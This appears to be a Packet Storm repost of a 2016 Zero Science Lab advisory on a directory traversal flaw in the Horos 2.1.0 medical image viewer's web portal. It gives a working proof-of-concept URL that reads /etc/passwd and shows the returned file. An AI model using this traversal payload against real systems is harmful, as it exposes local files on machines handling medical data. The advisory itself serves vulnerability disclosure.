exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Horos 2.1.0 Web Portal Remote Information Disclosure / Directory Traversal

Horos 2.1.0 Web Portal Remote Information Disclosure / Directory Traversal
Posted Dec 16, 2016
Authored by LiquidWorm | Site zeroscience.mk

Horos version 2.1.0 web portal suffers from an information disclosure vulnerability that can allow for directory traversal attacks.

tags | exploit, web, info disclosure
SHA-256 | 5b292fb767d1a7008b7b4e2db9b2af75b9d718ce14789df23fc0c01b43fe48e6

Horos 2.1.0 Web Portal Remote Information Disclosure / Directory Traversal

Change Mirror Download

Horos 2.1.0 Web Portal Remote Information Disclosure Exploit


Vendor: Horos Project
Product web page: https://www.horosproject.org
Affected version: 2.1.0

Summary: HorosaC/ is an open-source, free medical image viewer. The goal of the
Horos Project is to develop a fully functional, 64-bit medical image viewer for
OS X. Horos is based upon OsiriX and other open source medical imaging libraries.

Desc: Horos suffers from a file disclosure vulnerability when input passed thru the
URL path is not properly verified before being used to read files. This can be
exploited to include files from local resources with directory traversal attacks.

Tested on: macOS Sierra/10.12.2
macOS Sierra/10.12.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5387
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5387.php


15.12.2016

--


PoC request:

http://127.0.0.1:3333/.../...//.../...//.../...//.../...//.../...//etc/passwd


Response:

##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
...
...
...
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close